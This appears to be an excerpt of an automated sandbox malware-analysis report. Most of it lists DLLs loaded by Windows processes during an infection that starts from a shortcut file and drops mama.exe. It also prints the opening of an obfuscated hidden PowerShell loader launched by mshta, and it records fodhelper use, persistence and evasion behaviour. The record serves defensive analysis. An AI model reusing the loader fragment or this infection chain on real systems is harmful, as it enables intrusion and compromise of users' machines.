          Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: ieframe.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: netapi32.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: version.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: wkscli.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: edputil.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: mlang.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: slc.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: ieframe.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: netapi32.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: version.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: wkscli.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: edputil.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: mlang.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: slc.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\fodhelper.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: netapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: netutils.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: winmmbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: mmdevapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: devobj.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: ksuser.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: avrt.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: audioses.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: powrprof.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: umpdc.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: msacm32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: midimap.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: mpr.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: wininet.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: wsock32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: rasman.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: samcli.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: avifil32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: msvfw32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: cryptui.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: wtsapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: pstorec.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: propsys.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: mswsock.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: winsta.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: firewallapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: fwbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: sxs.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe Section loaded: fwpolicyiomgr.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
          Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
          Source: vreFmptfUu.lnk LNK file: ..\..\..\Windows\System32\OpenSSH\ssh.exe
          Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

          Data Obfuscation

          Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf
          Source: C:\Users\user\AppData\Roaming\mama.exe Code function: 43_2_03435340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,43_2_03435340
          Source: mama.exe.13.dr Static PE information: section name: .didata
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF7C15422B5 push eax; iretd 7_2_00007FF7C154233D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF7C15419A2 pushad ; ret 7_2_00007FF7C15419B1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF7BFC700BD pushad ; iretd 13_2_00007FF7BFC700C1

          Persistence and Installation Behavior

          Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file Process created: C:\Windows\System32\mshta.exe
          Source: LNK file Process created: C:\Windows\System32\cmd.exe
          Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\System32\cmd.exe Process created: reg.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\mama.exe

          Hooking and other Techniques for Hiding and Protection

          Source: mama.exe, 0000002B.00000003.1618824342.000000007E870000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: torConnect
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive WHERE DeviceID=\'c:\'
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1492Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 808Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1307Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 459Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5896Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3766Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5580
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3994
          Source: C:\Users\user\AppData\Roaming\mama.exeWindow / User API: threadDelayed 9761
          Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7540Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 1492 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 808 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -922337203685477s >= -30000sJump to behavior
